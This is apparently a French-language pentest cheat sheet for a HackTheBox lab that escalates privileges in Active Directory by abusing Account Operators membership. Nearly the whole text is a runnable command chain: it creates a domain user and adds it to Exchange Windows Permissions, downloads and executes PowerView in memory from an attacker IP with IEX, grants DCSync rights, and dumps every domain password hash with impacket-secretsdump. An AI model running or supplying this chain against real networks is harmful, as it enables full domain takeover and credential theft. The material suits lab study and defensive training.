# Account Operator (whoami /priv) - Windows Privilege Escalation
> Le groupe **Account Operators** dans Active Directory a des privilèges pour gérer les comptes utilisateurs et les groupes, à l'exception des comptes administratifs et des contrôleurs de domaine. Les membres de ce groupe peuvent créer, modifier et supprimer des comptes utilisateurs, mais n'ont pas accès à la gestion des autres objets sensibles du domaine.
#### Identification de l'appartenance à un groupe potentiellement problématique (Account Operator).
#### Utilisation de la capacité de création d'utilisateurs pour préparer une attaque DCSync.
```powershell
net user jordanmacia password123$ /add /domain
```
#### Ajout de l'utilisateur à un groupe avec des permissions plus élevées (`Exchange Windows Permissions`).
```bash
net group "Exchange Windows Permissions" jordanmacia /add
```
### Attaque WriteDACL:
```bash
$SecPassword = ConvertTo-SecureString 'password123$' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\jordanmacia', $SecPassword)
```
Préparation de l'attaque WriteDACL en utilisant PowerView\.ps1 pour ajouter une fonctionnalité.
{% embed url="" %}
#### Transférer le fichier
```bash
python3 -m http.server 80
```
```bash
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11/PowerView.ps1')"
```
## Vulnérabilité DCSync Attack:
#### Exécution de la commande Add-DomainObjectAcl pour obtenir les hashs.
```
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jordanmacia -Rights DCSync
```
#### Utilisation d'Impacket pour extraire les hashs avec l'utilisateur jordanmacia.
```
impacket-secretsdump htb.local/jordanmacia@10.10.10.161
```
